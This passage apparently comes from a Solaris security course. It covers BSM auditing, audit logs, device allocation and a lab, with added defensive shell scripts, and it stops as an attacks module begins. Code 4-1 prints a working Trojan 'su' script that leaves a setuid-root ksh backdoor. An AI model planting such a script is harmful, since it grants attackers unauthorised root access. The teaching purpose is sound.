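As an added example (not from the Sun course), the following shell script applies the Table 3-3 prefixes left to right to a flag string and then combines the system-wide flags from audit_control with a user's always-audit and never-audit fields, which is what lets you predict what an entry such as root:all:fr actually selects. The class list is the default set from Table 3-2; the treatment of no as the empty class, the output format (class:s, class:f, class:sf) and the function names are this example's own.

```sh
#!/bin/sh
# Added example (not from the Sun course): resolve audit flag strings.
# Default classes from Table 3-2, in table order; "all" expands to every one
# of them and "no" (the empty class) selects nothing.
AUDIT_CLASSES="fr fw fa fm fc fd cl pc nt ip na ad lo ap io ex ot"

# Apply a flag list left to right. Prints class:s (successes), class:f
# (failures) or class:sf for every class still selected at the end.
resolve_flags() {
    printf '%s\n' "$1" | awk -v classes="$AUDIT_CLASSES" '
    BEGIN { n = split(classes, cls, " ") }
    {
        gsub(/[ \t]/, "")                       # tolerate "lo, ad" spacing
        m = split($0, tok, ",")
        for (i = 1; i <= m; i++) {
            t = tok[i]
            if (t == "" || t == "no") continue
            on = 1; s = 1; f = 1                # bare class: select both outcomes
            if (substr(t, 1, 1) == "^") { on = 0; t = substr(t, 2) }   # ^ turns off
            p = substr(t, 1, 1)
            if (p == "+") { f = 0; t = substr(t, 2) }                   # successes only
            if (p == "-") { s = 0; t = substr(t, 2) }                   # failures only
            hit = 0
            for (j = 1; j <= n; j++) {
                if (t != "all" && t != cls[j]) continue
                hit = 1
                if (s) S[cls[j]] = on
                if (f) F[cls[j]] = on
            }
            if (!hit) printf("unknown audit class: %s\n", t) | "cat 1>&2"
        }
    }
    END {
        for (j = 1; j <= n; j++) {
            c = cls[j]
            if (S[c] && F[c]) print c ":sf"
            else if (S[c]) print c ":s"
            else if (F[c]) print c ":f"
        }
    }'
}

# Effective preselection for one user: system-wide flags plus the always-audit
# field, with every class in the never-audit field turned off last.
user_mask() {   # $1 = audit_control flags, $2 = always-audit, $3 = never-audit
    never=$(printf '%s\n' "$3" | awk -F, '{ for (i = 1; i <= NF; i++) if ($i != "") printf(",^%s", $i) }')
    resolve_flags "$1,$2$never"
}

resolve_flags 'all,^ad'            # everything except administrative actions
resolve_flags '-lo,+fd'            # failed logins and successful deletions
user_mask 'lo' 'all' 'fr'          # root:all:fr with flags:lo
user_mask 'lo,ad' 'no' ''          # audit:no: still inherits the system-wide flags
```

Note the last call: an audit_user entry that adds no classes does not exempt the user from the system-wide flags. A user who must keep working while the audit file systems are full needs all in the never-audit field, which is exactly the setting the note above warns against leaving in place by accident.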

Generating an Audit Trail

The audit daemon auditd creates and maintains the audit trail. The auditd daemon collects audit trail data and writes it to the files specified in the /etc/security/audit_control file. The audit trail files are the audit.log files.


Assessing the Responsibilities of the auditd Daemon

The auditd daemon performs the following tasks:

● Creates audit log files, in the order in which they are specified, in the directories specified in the audit_control file

● Reads audit data from the kernel and writes it to an audit log

● Executes the audit_warn script when the audit directories fill past the limits specified in the audit_control file

Warning – If you use the default system configuration, all processes that generate audit records are suspended when all audit directories are full. To avoid such suspension, ensure that you do not run out of disk space for auditing by configuring the audit scripts to delete or move files as described earlier, or by logging them to a remote system.

The audit daemon runs as the root user account; therefore, all files created by the auditd daemon are owned by root.


Examining audit.log Files

Audit data is stored in the directory named in the audit_control file, under a name composed of three dot-separated parts:

time-auditing-started.time-auditing-terminated.host-name

Each time is written as year, month, day, hour, minute and second (YYYYMMDDhhmmss) in GMT.

A new audit file is created after each reboot, and whenever the audit command is used to start a new log. For example, a file opened at 21:34:31 on August 13, 2001 and closed at 22:18:24 the same day on a host named grommit would be named:

20010813213431.20010813221824.grommit

While the file is still open (the audit daemon is still writing to it), it is named:

20010813222057.not_terminated.grommit
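Added example (not from the Sun course material): the functions below parse audit file names into their start time, end time and host, decide whether a file overlaps a time window (the file-level selection that auditreduce -a and -b make before reading any records), and move closed files out of an audit directory so that space is freed before the hard limit suspends processes, which is the kind of action the audit_warn discussion above suggests. The soft and hard conditions the hook dispatches on are the ones audit_warn(1M) passes as its first argument; the archive directory, the hostnames and the sample file names are constructed for the demonstration.

```sh
#!/bin/sh
# Added example (not from the Sun course): act on audit files by name only.
# A name is start.end.host; the timestamps are YYYYMMDDhhmmss, and end is
# "not_terminated" while auditd is still writing the file.

TS='[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]'

# Print "start end host" for an audit file name; fail for anything else.
audit_file_fields() {
    name=${1##*/}
    start=${name%%.*}; rest=${name#*.}
    end=${rest%%.*}; host=${rest#*.}
    case $start in $TS) ;; *) return 1 ;; esac
    case $end in not_terminated|$TS) ;; *) return 1 ;; esac
    [ -n "$host" ] && [ "$rest" != "$host" ] || return 1
    printf '%s %s %s\n' "$start" "$end" "$host"
}

# True when the file's span overlaps [from, to]; an open file runs to the end
# of time. This is the selection auditreduce -a/-b performs on file names.
audit_file_overlaps() {   # $1 = file name, $2 = from, $3 = to (YYYYMMDDhhmmss)
    from=$2; to=$3
    fields=$(audit_file_fields "$1") || return 2
    set -- $fields
    start=$1; end=$2
    [ "$end" = not_terminated ] && end=99999999999999
    [ "$start" -le "$to" ] && [ "$end" -ge "$from" ]
}

# Move every closed audit file from $1 to $2, leaving the one auditd is
# writing and anything that is not an audit file. Prints the number moved.
# Put $2 on a different file system, or nothing is freed.
archive_terminated_audit_files() {
    src=$1; dst=$2; moved=0
    mkdir -p "$dst" || return 1
    for f in "$src"/*; do
        [ -f "$f" ] || continue
        fields=$(audit_file_fields "$f") || continue
        case $fields in *" not_terminated "*) continue ;; esac
        mv "$f" "$dst/" && moved=$((moved + 1))
    done
    echo "$moved"
}

# Body for the audit_warn script: $1 is the condition auditd reports, $2 its
# argument (the audit directory for soft and hard). Other conditions pass through.
ARCHIVE_DIR=${ARCHIVE_DIR:-/export/audit-archive}   # assumption: a separate file system
audit_warn_hook() {
    case $1 in
        soft|hard) archive_terminated_audit_files "$2" "$ARCHIVE_DIR" >/dev/null ;;
        *) ;;
    esac
}

tmp=$(mktemp -d); mkdir -p "$tmp/audit"
# Constructed names: two closed files, the open one, and a stray file.
for n in 20010813213431.20010813221824.grommit 20010101000000.20010102000000.grommit \
         20010813222057.not_terminated.grommit README; do : > "$tmp/audit/$n"; done
audit_file_fields /var/audit/20010813213431.20010813221824.grommit
audit_file_overlaps 20010813213431.20010813221824.grommit 20010813220000 20010813230000 \
    && echo "overlaps the evening of 13 Aug 2001"
ARCHIVE_DIR=$tmp/archive
audit_warn_hook soft "$tmp/audit"
ls "$tmp/audit" "$tmp/archive"
rm -rf "$tmp"
```

The open file is never touched: the audit_data file names it, and moving it from under auditd would leave the daemon writing into a file that the next auditreduce run no longer finds in the audit directory.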


Interpreting the /etc/security/audit_data File

When the auditd daemon starts, it creates the file called /etc/security/audit_data. The file consists of a single entry with two fields separated by a colon (see the audit_data manual page listed in “Additional Resources” on page 3-3). The first field is the audit daemon's process ID, and the second field is the path name of the audit file to which the audit daemon is writing audit records. Code 3-3 shows an example file.

Code 3-3 Example /etc/security/audit_data File

# cat /etc/security/audit_data
116:/var/audit/20010813222057.not_terminated.grommit


Interpreting and Filtering Audit Data

BSM provides two tools to merge, select, view, and interpret audit records. You can use the tools directly or in conjunction with third-party application programs.

● auditreduce – Allows you to choose sets of records to examine

● praudit – Allows you to display audit records interactively and create very basic reports

Filtering Audit Data Using the auditreduce Command

The auditreduce command merges or selects particular audit records from one or more input audit.log files.


The auditreduce command can:

● Produce output containing audit records generated only by certain audit flags

● Show audit records generated by a particular user

● Collect audit records generated on specific dates

The auditreduce command can specify sets of available records to examine. For example, you can select all records from the past 24 hours to generate a daily report. You can select records that pertain to a specific user or event type. To create basic reports, use a pipe to direct the output of this command to the praudit command.


Formatting Audit Data Using the praudit Command

The praudit command converts the binary audit records into readable American Standard Code for Information Interchange (ASCII) and produces basic reports. Generally, you combine the auditreduce and praudit commands to produce concise, readable output.

For example, the following command finds all of the login events for the user eve in December 2001:

# auditreduce -a 20011201 -b +31d -u eve -c lo | praudit

This produces the following output:

header,81,1,login - rlogin,,Wed Dec 27 09:46:43 2001, +511485295 msec
subject,eve,eve,techies,eve,techies,10100,10100,24 5,penguin
text,successful login

This entry shows that user eve logged in to the system using the rlogin command from the penguin system. Similar messages are generated for events such as the ftp, telnet, and rsh utilities.
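As an added example (not from the Sun course), the script below reduces praudit's comma-separated token output, such as the output of auditreduce -c lo | praudit, to one line per record and counts the records per user whose return token is not success, which on login records is the check you run when looking for password guessing. The sample records are constructed for the example, modelled on the eve record above and extended with the return token that closes every record; the user names, hosts and failure text are invented.

```sh
#!/bin/sh
# Added example (not from the Sun course): summarize praudit output.
# praudit prints one token per line, fields separated by commas; a record
# starts with its header token and ends with its return token.

# Reduce each record to: user, host, event, outcome, time (tab separated).
record_summary() {
    awk -F, '
    function flush() {
        if (event != "") printf("%s\t%s\t%s\t%s\t%s\n", user, host, event, outcome, when)
        event = ""; user = ""; host = ""; outcome = ""; when = ""
    }
    function trim(v) { gsub(/^ +| +$/, "", v); return v }
    $1 == "header"  { flush(); event = trim($4); when = trim($6) }
    $1 == "subject" { user = trim($2); host = trim($NF); sub(/.* /, "", host) }  # terminal id ends with the host
    $1 == "return"  { outcome = trim($2) }
    END { flush() }'
}

# Users with at least $1 (default 1) records whose return token is not
# "success", most failures first.
failures_by_user() {
    record_summary | awk -F'\t' -v min="${1:-1}" '
        $4 != "success" { n[$1]++ }
        END { for (u in n) if (n[u] >= min) print n[u], u }' | sort -rn
}

# Constructed sample: praudit output of auditreduce -c lo, modelled on the
# eve record in the text. Names, hosts and failure messages are invented.
sample_praudit_output() {
    cat <<'EOF'
header,81,1,login - rlogin,,Wed Dec 27 09:46:43 2001, +511485295 msec
subject,eve,eve,techies,eve,techies,10100,10100,24 5,penguin
text,successful login
return,success,0
header,83,1,login - telnet,,Wed Dec 27 09:52:10 2001, +10002000 msec
subject,mallory,mallory,techies,mallory,techies,10130,10130,24 9,wallace
text,invalid password
return,failure: Permission denied,-1
header,83,1,login - telnet,,Wed Dec 27 09:52:31 2001, +20004000 msec
subject,mallory,mallory,techies,mallory,techies,10131,10131,24 9,wallace
text,invalid password
return,failure: Permission denied,-1
header,83,1,login - telnet,,Wed Dec 27 09:52:55 2001, +30006000 msec
subject,mallory,mallory,techies,mallory,techies,10132,10132,24 9,wallace
text,invalid password
return,failure: Permission denied,-1
header,81,1,login - rlogin,,Wed Dec 27 10:01:12 2001, +40008000 msec
subject,bob,bob,techies,bob,techies,10140,10140,24 5,penguin
text,invalid password
return,failure: Permission denied,-1
EOF
}

sample_praudit_output | record_summary
echo "--- users with two or more failures:"
sample_praudit_output | failures_by_user 2
```

On a real system replace sample_praudit_output with auditreduce -a <start> -c lo /var/audit/* | praudit; the record boundaries and field positions are the same, so the summary needs no change.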


Controlling the auditd Daemon Using the audit Command

The audit command provides an interface to the audit daemon. Its options tell the auditd daemon to close the current log file and start a new one (audit -n), or to stop auditing temporarily (audit -t), as shown in the exercise at the end of this module.

Note – If the audit command stops auditing, it is restarted after a reboot.To permanently disable auditing, use the bsmunconv command.


Implementing BSM Device Management

This section considers the security of I/O devices. In this section, security is concerned with confidentiality and prevention of accidental or malicious damage to data.

For example, in some environments, several users share a cartridge tape drive. The drive is located away from the user workstations. This configuration creates opportunities for outsiders to gain access to data on the unattended drive. When a user loads the tape and makes the tape drive ready, the tape effectively becomes available to any user who executes some kind of I/O operation on it.

The BSM device-allocation mechanism makes it possible to assign certain devices to one user at a time so that the device can be accessed only by that user while it is assigned to that user's name.

The device-allocation mechanism prevents:

● Simultaneous access to a device

● Other users from reading the media data just written


● Other users from overwriting the media

● Other users from obtaining information from the device’s or the driver’s internal storage after another user is finished with the device

Configuring BSM Device Management

Some of the allocation mechanism components are the:

● allocate , deallocate , dminfo , and list_devices commands

● /etc/security/device_allocate file

● /etc/security/device_maps file

● Lock files that exist for each allocatable device in the /etc/security/dev directory

● Device-clean scripts for each allocatable device


Interpreting the /etc/security/device_maps File

The /etc/security/device_maps file defines the device file mappings for each device. This file associates all physical devices with a device name (such as st0). You can edit the device_maps file by hand and use the dminfo utility to report or update information about a device entry in this file.

Each device is represented by a one-line entry, such as:

device-name:device-type:device-list


Table 3-4 defines the /etc/security/device_maps fields.

Note – The device-list field must contain all device files that allow access to a particular device. If the list is incomplete, a malevolent user can still obtain or modify private information through the device files that were left out.

Code 3-4 shows an example of entries for Small Computer System Interface (SCSI) tape st0 and diskette fd0.

Code 3-4 Example SCSI Entries

fd0:fd:\
/dev/fd0 /dev/fd0a /dev/fd0b /dev/rfd0 /dev/rfd0a /dev/rfd0b:
st0:st:\
/dev/rst0 /dev/rst8 /dev/rst16 /dev/nrst0 /dev/nrst8 /dev/nrst16:

Note – Although the bsmconv command creates a device_maps file when BSM is enabled, use this initial map file only as a starting point. You must augment and customize the device_maps file for the individual site.

Table 3-4 The /etc/security/device_maps Fields

Field Name Description

device-name The device name, such as st0 , fd0 , or audio .

device-type The generic device type (the name for the class of devices such as st, fd, audio). The device-type logically groups related devices.

device-list A list of the device files associated with the physical device. This can be the real device files located under the /devices directory or the symbolic links in the /dev directory, provided for binary compatibility.


Interpreting the /etc/security/device_allocate File

Devices that can be allocated are listed in the /etc/security/device_allocate file. This file contains mandatory access control information about each physical device managed by the device-allocation mechanism. This is a per-system file and cannot be defined as a name services resource (for example, an NIS map or NIS+ table object, or Lightweight Directory Access Protocol (LDAP)).

In the device_allocate file, each device is represented by a one-line entry:

device-name;device-type;reserved;reserved;alloc;device-clean


Table 3-5 defines the /etc/security/device_allocate fields.

When BSM is enabled with the /etc/security/bsmconv command, default devices and their characteristics are automatically defined in the /etc/security/device_allocate file.

Code 3-5 shows an example /etc/security/device_allocate file.

Code 3-5 Example /etc/security/device_allocate File

audio;audio;reserved;reserved;solaris.device.allocate; \
/etc/security/lib/audio_clean
fd0;fd;reserved;reserved;solaris.device.allocate; \
/etc/security/lib/fd_clean
sr0;sr;reserved;reserved;solaris.device.allocate; \
/etc/security/lib/sr_clean

Table 3-5 The /etc/security/device_allocate Fields

Field Name Description

device-name The device name, such as st0 , fd0 , or audio .

device-type The generic device type (the name for the class of devices such as st, fd, and audio). The device-type logically groups related devices.

reserved These fields are reserved for future use.

alloc Specifies whether the device can be allocated. This field contains a comma-separated list of authorizations (see the Solaris OE manual page for device_allocate for the appropriate auths values) required to allocate the device. An asterisk (*) indicates that the device is not allocatable, and an at sign (@) indicates that any user can allocate the device without an explicit authorization (used in the exercise at the end of this module).

device-clean The path name of a program to be invoked for special handling, such as cleanup and object-reuse protection during the allocation process.


The Device-Clean Scripts

The device-clean scripts ensure that any data left on a device by a user is cleared before the device is allocated to another user.

Enabling BSM automatically provides several device-clean scripts. These support the following standard devices:

● SCSI 1/4-inch tape (st_clean )

● Archive 1/4-inch tape (st_clean )

● Open-reel 1/2-inch tape (st_clean )

● Diskette (fd_clean )

● CD-ROM (sr_clean )

Note – If you add more allocatable devices to your system, you might have to write your own device-clean scripts. Design the script so that it accepts any parameters passed from the deallocate command.


Authorizing Users to Access Devices

The /etc/security/auth_attr file defines authorizations. Authorizations grant users access to certain system functionality. Code 3-6 shows entries in the authorizations file.

Code 3-6 Entries in the Authorizations File

solaris.device.:::Device Allocation::help=DevAllocHeader.html
solaris.device.allocate:::Allocate Device::help=DevAllocate.html
solaris.device.config:::Configure Device Attributes::help=DevConfig.html
solaris.device.grant:::Delegate Device Administration::help=DevGrant.html
solaris.device.revoke:::Revoke or Reclaim Device::help=DevRevoke.html

Solaris OE supplies the authorizations file; you do not need to edit it.


You can grant a user an authorization, such as Solaris OE device management, by adding an auths entry to the user's line in the /etc/user_attr file, quoting the required authorization. Do this using the usermod or useradd commands. The following example grants the user alice all of the solaris.device authorizations shown in Code 3-6 on page 3-37:

# usermod -A "solaris.device.*" alice


Device Allocation and De-Allocation

Use the following commands to allocate and de-allocate devices. See the Solaris OE manual pages (“Additional Resources” on page 3-3) for more information on these commands.

● The allocate command – Assigns a device to a user. For example:

# allocate st0

A superuser can reallocate a previously allocated device to a new user with the -F (force) and -U (user name) options; the device name is the last argument:

# allocate -F -U fred st0

● The deallocate command – Releases a previously allocated device. For example:

# deallocate st0

● The list_devices command – Lets you view a list of all allocatable devices, devices currently allocated, and allocatable devices not currently allocated.

● The dminfo command – Reports and updates information about a device in the device_maps file.


Managing Devices Using BSM

This section shows how to use BSM to manage and add new devices.

To manage devices:

1. Edit the device_maps file and add any new device names and all the associated device files.

2. Edit the device_allocate file to define which devices should be made allocatable.

3. Use authorizations to decide which regular users, if any, should be allowed to allocate devices. Use the usermod -A command.

4. Create an empty lock file for each allocatable device in the /etc/security/dev directory. The lock file name must coincide with the device name in the device_maps file. Ensure that the lock file is owned by root and is set with the following permissions:

-r-------- 1 root bin 0 Jan 6 2000 st0


5. Create a device-clean script, if needed, for each new device.

6. Make all device files for the device owned by user bin , group bin ,and mode 000 .

If BSM has been started, the devices defined in the device_allocate file are now under device allocation control. Only users authorized in Step 3 can access these devices.
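Added example (not part of the Sun course): a script that checks the device-allocation configuration against steps 1 to 6 above. For every device in device_maps it verifies that device_allocate has an entry, warns when the entry is open to any user (@), checks that the lock file in /etc/security/dev exists with mode 400 and the expected owner and group, that every device file in the device-list exists with mode 000, and that the device-clean script is present and executable. The root prefix argument, the LOCK_OWNER, LOCK_GROUP, DEV_OWNER and DEV_GROUP variables, the function names and the staging tree it builds from the Code 3-4 and Code 3-5 entries are this example's own conventions; the sample tree is constructed in a temporary directory and deliberately contains two faults.

```sh
#!/bin/sh
# Added example (not from the Sun course): check the device-allocation setup.
# Expected ownership can be overridden for a staging tree; the values from the
# text (lock files root:bin mode 400, device files bin:bin mode 000) are defaults.
LOCK_OWNER=${LOCK_OWNER:-root}; LOCK_GROUP=${LOCK_GROUP:-bin}
DEV_OWNER=${DEV_OWNER:-bin};    DEV_GROUP=${DEV_GROUP:-bin}

# Print a file as one entry per line: join backslash continuations, drop comments.
join_entries() {
    awk '
        /^[ \t]*#/ { next }
        { s = $0; if (line != "") sub(/^[ \t]+/, "", s); line = line s }
        /\\$/ { sub(/[ \t]*\\$/, "", line); next }
        { if (line != "") print line; line = "" }' "$1"
}

# Report when $1 is missing, or is not mode $2 owned by $3:$4; $5 labels the report.
check_meta() {
    meta=$(ls -ld "$1" 2>/dev/null) || { echo "$5: missing: $1"; return; }
    set -- "$1" "$2" "$3" "$4" "$5" $meta            # $6 perm, $8 owner, $9 group
    perm=${6%[.+@]}                                  # drop ACL/SELinux marker
    [ "$perm" = "$2" ] || echo "$5: mode is $perm, want $2: $1"
    [ "$8:$9" = "$3:$4" ] || echo "$5: owner is $8:$9, want $3:$4: $1"
}

# One line per problem for the tree rooted at $1 ("" for the live system).
device_allocation_report() {
    root=$1
    join_entries "$root/etc/security/device_maps" | while IFS=: read -r name type list rest; do
        [ -n "$name" ] || continue
        # 1. device_allocate must list the device; field 5 says who may allocate it.
        entry=$(join_entries "$root/etc/security/device_allocate" | awk -F';' -v n="$name" '$1 == n')
        if [ -z "$entry" ]; then echo "$name: no device_allocate entry"; continue; fi
        auth=$(printf '%s\n' "$entry" | cut -d';' -f5)
        clean=$(printf '%s\n' "$entry" | cut -d';' -f6)
        case $auth in
            '*') continue ;;                          # explicitly not allocatable
            '@') echo "$name: allocatable by any user (@), no authorization required" ;;
        esac
        # 2. The lock file in /etc/security/dev records who holds the device.
        check_meta "$root/etc/security/dev/$name" "-r--------" "$LOCK_OWNER" "$LOCK_GROUP" "$name lock file"
        # 3. Every device file in the list: mode 000, so only allocate grants access.
        for dev in $list; do
            check_meta "$root$dev" "----------" "$DEV_OWNER" "$DEV_GROUP" "$name device file $dev"
        done
        # 4. The device-clean script must exist and carry the owner execute bit.
        cperm=$(ls -ld "$root$clean" 2>/dev/null | awk '{ print $1 }')
        case $cperm in
            -??x*) ;;
            "") echo "$name: device-clean script missing: $clean" ;;
            *)  echo "$name: device-clean script not executable: $clean" ;;
        esac
    done
}

# Exit 0 when the report is empty; otherwise print it and exit 1.
device_allocation_check() {
    out=$(device_allocation_report "$1")
    [ -z "$out" ] && return 0
    printf '%s\n' "$out"
    return 1
}

# Constructed staging tree from the Code 3-4 and Code 3-5 entries, with two
# deliberate faults: st0 has no device_allocate entry and /dev/fd0b is readable.
build_sample_tree() {
    mkdir -p "$1/etc/security/dev" "$1/etc/security/lib" "$1/dev"
    cat > "$1/etc/security/device_maps" <<'EOF'
# constructed from Code 3-4
fd0:fd:\
/dev/fd0 /dev/fd0a /dev/fd0b /dev/rfd0 /dev/rfd0a /dev/rfd0b:
st0:st:\
/dev/rst0 /dev/rst8 /dev/rst16 /dev/nrst0 /dev/nrst8 /dev/nrst16:
EOF
    cat > "$1/etc/security/device_allocate" <<'EOF'
# constructed from Code 3-5 (st0 left out on purpose)
fd0;fd;reserved;reserved;solaris.device.allocate; \
/etc/security/lib/fd_clean
EOF
    for d in fd0 fd0a fd0b rfd0 rfd0a rfd0b; do : > "$1/dev/$d"; chmod 000 "$1/dev/$d"; done
    chmod 644 "$1/dev/fd0b"
    : > "$1/etc/security/dev/fd0"; chmod 400 "$1/etc/security/dev/fd0"
    printf '#!/bin/sh\nexit 0\n' > "$1/etc/security/lib/fd_clean"; chmod 755 "$1/etc/security/lib/fd_clean"
}

tmp=$(mktemp -d); build_sample_tree "$tmp"
# The staging tree belongs to whoever runs this, so check against that owner.
LOCK_OWNER=$(ls -ld "$tmp" | awk '{ print $3 }'); DEV_OWNER=$LOCK_OWNER
LOCK_GROUP=$(ls -ld "$tmp" | awk '{ print $4 }'); DEV_GROUP=$LOCK_GROUP
device_allocation_check "$tmp" || echo "fix the problems above before relying on allocation"
rm -rf "$tmp"
```

On the live system run device_allocation_check "" as root with the default ownership values. A readable device file such as the /dev/fd0b fault above is exactly the gap the note on the device-list field warns about: allocation locks nothing that the device files themselves still hand out.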


Exercise: Using the Basic Security Module

In this exercise, you complete the following tasks:

● Install BSM and configure auditing for users

● Examine audit data and manage the audit file

● Restrict access to the floppy drive using device allocation features

Preparation

No preparation is required for this exercise.

Tasks

To complete the first task, you install and configure auditing. After you reboot, system auditing begins and the log files continue to grow until auditing is switched off. Although you are not required to finish all of the tasks in the time allocated by the instructor, be sure to disable BSM and reboot the system before moving on.

Task – Installing and Configuring BSM

In this task, you configure your system to use the BSM to log events. You begin by logging some specific events. Later, you log all events and compare the amount of data.

Follow these steps:

1. Run the bsmconv script to begin auditing. This script starts the audit daemon after the system is booted, but do not reboot the system yet.

2. Before rebooting, configure the types of activity that BSM audits on your system. Edit the /etc/security/audit_control file, which controls system-wide auditing.


a. Edit the file to instruct the auditd daemon to create the first (primary) audit log in the /var/audit directory. If the primary log file consumes more than 90 percent of the available space, configure the audit daemon to close the current log and start a new one in the /var/audit1 directory.

b. Remove old audit files from the /var/audit directory.

c. Instruct the auditd daemon to record all successful or unsuccessful logins and logouts, all successful or unsuccessful administrative actions, and all failed file attribute changes that can be attributed to users.

Note – Because you are not monitoring non-attributable events, do not edit the naflags: line.

3. Qualify the amount of data to be logged for the user alice by adding an entry for alice to the /etc/security/audit_user file as follows. This entry specifies that all events by alice, except file reads, should be audited:

# vi /etc/security/audit_user
alice:all:fr

4. If the file system holding the audit logs fills up, you might not be able to access your system. To prevent this scenario for these exercises, disable logging for the root user.

Note – Disabling auditing for root is not an option on most systems. Instead, create a user account which can only clean up audit file space or disable BSM. Disable logging for this user.

5. Reboot the system to begin auditing.

Task – Monitoring Audit Data

Auditing should now be enabled. Go through the following steps to monitor the audit data that is being collected:

1. After the system has rebooted, log in as root in one window andalice in another.

2. From the root account, use the following commands to determine what process ID the audit daemon is using and where the audit data is being stored:

# cd /etc/security
# cat audit_data


3. Change to the /var/audit directory.

4. Use the praudit command to examine the audit file.

a. From the alice user account, perform some actions (such as cd or ls).

b. Re-examine the audit file to see the additional records (you might want to save each command output to a file and look for the differences with the diff command).

5. Use the audit command to close the current log file and open a new log file.

# cd /var/audit
# ls -l
# audit -n
# ls -l

6. Use the audit command to temporarily stop auditing and check that the audit log stops growing.

# audit -t

Task – Securing a Peripheral Device

Use the device allocation mechanism to secure a peripheral device (which for this exercise is the diskette device):

1. Examine the /etc/security/device_allocate file. The first column of the file lists all devices that are allocatable to a particular login on the system.

# cat device_allocateaudio;audio;reserved;reserved;solaris.device.allocate;/etc/security/lib/audio_cleanfd0;fd;reserved;reserved;solaris.device.allocate;/etc/security/lib/fd_cleansr0;sr;reserved;reserved;solaris.device.allocate;/etc/security/lib/sr_clean

2. Log in as user alice in a second window and issue the followingcommand to determine if alice can reserve the floppy disk.

alice$ /usr/sbin/allocate fd0


3. Edit the /etc/security/device_allocate file and change the entry for the device fd0 as follows:

fd0;fd;reserved;reserved;@;/etc/security/lib/fd_clean

Note – The @ character inserted into the /etc/security/device_allocate file allows all users to allocate devices. The alternative is to give only alice and bob solaris.device.allocate privileges. To do this, add the following entries for alice and bob in /etc/user_attr:

alice::::type=normal;auths=solaris.device.allocate
bob::::type=normal;auths=solaris.device.allocate

4. From the alice user account reissue the allocate command. Can alice reserve the device now?

5. Insert a diskette into your diskette drive. As alice, allocate the diskette drive for your exclusive use and then create a tar archive of the /etc/motd file.

alice$ /usr/sbin/allocate fd0
alice$ cd /etc
alice$ tar cvf /dev/fd0 motd

6. Log in as the user bob, then try to copy the file from the tar file you created in the previous step. Did this work?

bob$ tar xvf /dev/fd0

7. As bob, try to allocate the diskette drive for your use. Did this work?

bob$ allocate fd0

8. Examine the lock file to determine who has the device allocated.

# ls -l /etc/security/dev

9. As user alice, de-allocate the diskette drive.

alice$ /usr/sbin/deallocate fd0

10. As bob, allocate the diskette drive. Can you extract the motd file now? What implications does this have?


Task – Disabling BSM Auditing

This task disables auditing on your system. You must perform this task, even if you have not completed all the other tasks, to ensure that the audit logs do not grow too large and cause system problems.

1. Log in as root and run the bsmunconv command to permanently disable auditing.

# cd /etc/security
# ./bsmunconv

2. Remove any files in the /var/audit directory.

3. Reboot the system.


Exercise Summary

Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following are the solutions to the tasks.

Installing and Configuring BSM

The /etc/security/audit_control file should look like:

# Copyright (c) 1988 by Sun Microsystems, Inc.
#
#ident @(#)audit_control.txt 1.3 98/06/20 SMI
#
dir:/var/audit
dir:/var/audit1
flags:lo,ad,-fm
minfree:10
naflags:

Monitoring Audit Data

As this exercise is prescriptive, there is no solution.

Securing a Peripheral Device

Use the device allocation mechanism to secure a peripheral device:

4. The user alice can reserve the device.

6. The user bob cannot copy the tar file.

7. The user bob cannot allocate the device.

8. You should see that the alice user owns the lock file.

10. The user bob can now allocate the drive and extract the motd file. The implication is that BSM can aid security, but not if your users carelessly leave sensitive data in the drive.

Disabling BSM Auditing

As this exercise is prescriptive, there is no solution.


Module 4

Security Attacks

Objectives

Upon completion of this module, you should be able to:

● Recognize and detect the following common security attacks and list at least two consequences of each:

● Trojan horses

● Back door attacks

● Denial of Service (DoS) attacks

● Describe how attackers can use a rootkit to cover their tracks


Relevance

Discussion – Reports of system and server attacks are a daily occurrence.

● Could you recognize the most common types of attack?

● Can you be sure that your system files have not been modified to perform additional tasks?

● Can you identify measures to prevent DoS attacks?

● Is prevention always possible?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Garfinkel, Simson and Gene Spafford. Practical UNIX & Internet Security. O’Reilly & Associates, Inc., 1996.

● Schneier, Bruce. Secrets & Lies. John Wiley & Sons, 2000.

● Scambray, McClure, Kurtz. Hacking Exposed. Osborne McGraw-Hill, 2001.

● Online tripwire resources: [http://www.tripwire.com/]

● Online ASET information: [http://www.sun.com/]

● Solaris OE Fingerprint Database: [http://sunsolve.sun.com/]

● Solaris OE AnswerBook 2.

● Solaris OE online manual pages for limit(1), kernel(1M), modinfo(1M), modload(1M), proc(1M), quot(1M), strip(1), tunefs(1M), and ulimit(1)


Recognizing Trojan Horses

The concept of the Trojan horse is borrowed from the Greek battle for the city of Troy. Greek soldiers hid inside a large wooden horse which the Trojans, assuming it was a gift, brought into the city of Troy. The Greek soldiers later climbed out of the horse and killed everyone in the city.

Software is described as a Trojan horse when it performs an expected function, but also executes additional commands which subvert the security measures in place or cause damage to the system.


Example Trojan Horses

This section provides several examples that illustrate the common types of Trojan horse problems.


Changing the Search Path to Hide Standard System Utilities

A user produces a Bourne shell script called su, shown in Code 4-1.

Code 4-1 Trojan Horse Example Shell Script

# cat su
#!/bin/sh
/bin/cp /usr/bin/ksh ./ksh
/bin/chmod 4775 ./ksh
/bin/rm $0
/bin/su "$@"

For the example in Code 4-1 to work, the user sets the search path so that the current directory is at the front of the search path. Now the user creates a problem in their directory which requires superuser privileges to fix.


When the administrator runs the su command from the user’s terminal or Telnet session, the administrator picks up the Trojan Horse su command instead of the real one, which creates a back door shell (owned by root with set-user-id). The su command removes itself after it has served its purpose.

A good administrator defends against this attack by always using the full pathname for the su command (/bin/su).


The root Path

Because of the risk of running the wrong program, the root user’s $PATH variable should never include the current directory. In general, a privileged account should not have a directory in its search path that is writable by others.

The latest versions of the su command reset the PATH variable for the root user when you use the su command to change to the root user. The root path is defined by the variable SUPATH in the /etc/default/su file and should be set to a search path which does not include the current directory.

Test your knowledge of the PATH variable by deciding which of these paths contains the current directory:

1. PATH=/usr/bin:/usr/sbin:/usr/openwin/bin

2. PATH=/usr/bin:/usr/sbin:.:/usr/openwin/bin

3. PATH=/usr/bin:/usr/sbin:.

4. PATH=/usr/bin::/usr/sbin


5. PATH=/usr/bin:/usr/sbin:

6. PATH=:/usr/bin:/usr/sbin
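A check for both conditions the text raises, a current-directory entry and a search-path directory that other users can write to, written here as an added example rather than code from the course. It assumes only POSIX sh, ls and sed, and reads SUPATH from /etc/default/su where that file exists.

```shell
#!/bin/sh
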